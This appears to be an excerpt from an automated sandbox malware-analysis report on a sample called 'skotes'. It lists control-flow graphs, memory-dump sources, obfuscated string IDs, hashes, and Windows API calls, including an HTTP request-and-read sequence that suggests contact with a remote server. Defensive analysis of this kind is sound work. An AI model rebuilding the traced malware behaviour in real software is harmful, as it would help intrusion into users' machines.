RtlAllocateHeap __cftof __dosmaperr 37323->37330 37325 bac27f 37325->37320 37331 bb2191 37325->37331 37327 bac291 37327->37320 37338 bb2988 RtlAllocateHeap __FrameHandler3::FrameUnwindToState 37327->37338 37329->37323 37330->37325 37332 bb219d 37331->37332 37333 bb21b2 37331->37333 37334 ba75f6 __dosmaperr RtlAllocateHeap 37332->37334 37333->37327 37335 bb21a2 37334->37335 37339 ba6c5a RtlAllocateHeap __cftof 37335->37339 37337 bb21ad 37337->37327 37338->37320 37339->37337

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 438 b7e530-b7e843 call b87a00 call b75c10 call b87a00 call b75c10 call b89280 call b88320 call b88220 call b88320 call b87a00 * 3 call b7be30 call b87a00 * 2 call b75c10 call b78580 476 b7e8ce-b7e9ec 438->476 477 b7ea1a-b7ea62 438->477 486 b7ea99-b7eab2 call b8cff1 476->486 487 b7e9f2-b7e9fe 476->487 477->476 481 b7ea8f-b7ea96 call b8d663 477->481 481->486 487->481 489 b7ea04-b7ea12 487->489 489->477 491 b7eab8-b7eda3 call ba6c6a * 2 call b87a00 call b75c10 call b883c0 call b88220 GetFileAttributesA call b87a00 call b75c10 call b883c0 call b88220 GetFileAttributesA 489->491 521 b7eda9-b7ee79 491->521 526 b7f273-b7f28b 521->526 527 b7f5bb-b7f66c call b880c0 521->527 528 b7f6a3-b7f6b6 526->528 529 b7f291-b7f29d 526->529 527->526 532 b7f699-b7f6a0 call b8d663 527->532 531 b7f2a3-b7f2b1 529->531 529->532 531->527 535 b7f6cb-b7f962 call ba6c6a call b87a00 call b75c10 call b87a00 * 4 call b7e530 call b880c0 call b87a00 call b880c0 * 2 531->535 532->528 570 b7f964-b7f970 535->570 571 b7f98c-b7f9a5 call b8cff1 535->571 572 b7f982-b7f989 call b8d663 570->572 573 b7f972-b7f980 570->573 572->571 573->572 575 b7f9ab-b7fb15 call ba6c6a call b87a00 call b75c10 call b87a00 * 4 call b7e530 573->575 600 b7fb17-b7fb23 575->600 601 b7fb3f-b7fb4e 575->601 602 b7fb35-b7fb3c call b8d663 600->602 603 b7fb25-b7fb33 600->603 602->601 603->602 604 b7fb4f-b7fc6f call ba6c6a call b87a00 call b79580 call b79230 call b88320 603->604 620 b7fc70-b7fc75 604->620 620->620 621 b7fc77-b80860 call b880c0 call b87a00 * 2 call b7c360 call ba6729 call b87a00 call b75c10 call b87a00 * 4 call b7e530 620->621 656 b8088a-b808a5 call b8cff1 621->656 657 b80862-b8086e 621->657 659 b80880-b80887 call b8d663 657->659 660 b80870-b8087e 657->660 659->656 660->659 661 b808ce-b815f2 call ba6c6a call b87a00 call b75c10 call b87a00 * 4 call b7e530 660->661
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                                                                                                                                                                                                                          • API String ID: 0-2571795437
                                                                                                                                                                                                                                          • Opcode ID: e8725ff29a0ee0d636446f0ad99c9ce0667f0199662f8f1aa527fa2b8488e41c
                                                                                                                                                                                                                                          • Instruction ID: 674ed0d2db97138db990f3aa0d1865d4d97dbab005ae90ba337fbd776f6b1f46
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8725ff29a0ee0d636446f0ad99c9ce0667f0199662f8f1aa527fa2b8488e41c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F082C170904288DBEF14EF68C9897DEBFF5AB05304F6085C9E815273D2D7759A88CB92

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7EB51
                                                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(00000000), ref: 00B7EC83
                                                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00B7ED98
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                                                                          • String ID: mxo1L0x$#$111$246122658369$9c9aa5$FCQgKF==$FisgLnsCZO1i$GiQaT29tduF=$UA==$WDw=$WTs=$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 1875963930-2267310118
                                                                                                                                                                                                                                          • Opcode ID: 9882fe2a31ae236b0be119bac734ba4f21c1fc94fb2f171f65b1a2cd408d61de
                                                                                                                                                                                                                                          • Instruction ID: 60b80f5a6186dec269baf5d00b55da32b6882d011a77a3b9a737f31a02638788
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9882fe2a31ae236b0be119bac734ba4f21c1fc94fb2f171f65b1a2cd408d61de
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F25C71A101489BEF18EB38CD8979DBBF2AF46304F1481D8E419A73E6DB359AC4CB51

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 697 b7be30-b7be7c 698 b7be82-b7be86 697->698 699 b7c281-b7c2a6 call b880c0 697->699 698->699 700 b7be8c-b7be90 698->700 705 b7c2d4-b7c2ec 699->705 706 b7c2a8-b7c2b4 699->706 700->699 702 b7be96-b7bf2a Sleep InternetOpenW InternetConnectA call b87a00 call b75c10 700->702 732 b7bf2e-b7bf4a HttpOpenRequestA 702->732 733 b7bf2c 702->733 709 b7c2f2-b7c2fe 705->709 710 b7c238-b7c250 705->710 707 b7c2b6-b7c2c4 706->707 708 b7c2ca-b7c2d1 call b8d663 706->708 707->708 712 b7c34f-b7c354 call ba6c6a 707->712 708->705 714 b7c304-b7c312 709->714 715 b7c22e-b7c235 call b8d663 709->715 716 b7c256-b7c262 710->716 717 b7c323-b7c33f call b8cff1 710->717 714->712 721 b7c314 714->721 715->710 722 b7c319-b7c320 call b8d663 716->722 723 b7c268-b7c276 716->723 721->715 722->717 723->712 730 b7c27c 723->730 730->722 734 b7bf4c-b7bf5b 732->734 735 b7bf7b-b7bfea call b87a00 call b75c10 call b87a00 call b75c10 732->735 733->732 737 b7bf71-b7bf78 call b8d663 734->737 738 b7bf5d-b7bf6b 734->738 749 b7bfee-b7c004 HttpSendRequestA 735->749 750 b7bfec 735->750 737->735 738->737 751 b7c006-b7c015 749->751 752 b7c035-b7c05d 749->752 750->749 753 b7c017-b7c025 751->753 754 b7c02b-b7c032 call b8d663 751->754 755 b7c05f-b7c06e 752->755 756 b7c08e-b7c0b5 InternetReadFile 752->756 753->754 754->752 758 b7c084-b7c08b call b8d663 755->758 759 b7c070-b7c07e 755->759 763 b7c0c0-b7c168 call ba4250 InternetReadFile 756->763 758->756 759->758 771 b7c16a-b7c170 763->771 771->763
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNEL32(000005DC,EB1D7F10,?,00000000), ref: 00B7BEB8
                                                                                                                                                                                                                                          • InternetOpenW.WININET(00BC8DC8,00000000,00000000,00000000,00000000), ref: 00B7BEC7
                                                                                                                                                                                                                                          • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00B7BEEC
                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,00000000), ref: 00B7BF36
                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(?,00000000), ref: 00B7BFF6
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000003FF,?), ref: 00B7C0A7
                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,00000000,000003FF,?,?,00000000,?,?), ref: 00B7C161
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00B7C187
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00B7C18F
                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00B7C197
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Internet$CloseHandle$FileHttpOpenReadRequest$ConnectSendSleep
                                                                                                                                                                                                                                          • String ID: 8HJUeIfzLo==$8HJUeMD Lq5=$8q$RE1NXF==$invalid stoi argument$stoi argument out of range
                                                                                                                                                                                                                                          • API String ID: 1439999335-1459022851
                                                                                                                                                                                                                                          • Opcode ID: 1830391ba87414b4fd79b0a892ed3521c476eaa01369b7aaceeea6b5324d4a6c
                                                                                                                                                                                                                                          • Instruction ID: 73eb10e73b9a4f68440432a2611ffcf09aa37e1dfa4846070994e50a20ef3f06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1830391ba87414b4fd79b0a892ed3521c476eaa01369b7aaceeea6b5324d4a6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B1D2B16001189BDB28DF28CC84BADBBE5EF45304F5081EDF519A72D2DB709AC0CB95

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
